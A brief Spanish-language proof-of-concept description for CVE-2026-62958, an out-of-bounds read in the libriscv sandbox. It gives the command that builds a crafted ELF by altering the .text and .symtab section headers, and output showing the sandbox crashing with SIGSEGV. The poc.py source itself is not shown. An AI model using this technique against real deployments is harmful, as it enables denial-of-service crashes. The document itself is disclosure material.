
Exploit de prueba de concepto para CVE-2026-62958 que demuestra una vulnerabilidad de lectura fuera de los límites en el sandbox de Libriscv, lo que permite un bloqueo del sandbox mediante un binario ELF manipulado.
Una vulnerabilidad en Libriscv permite al atacante bloquear el sandbox utilizando una lectura fuera de los límites.
Para crear Bad elf:
python3 poc.py samplefile poisoned_file
Resultados:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)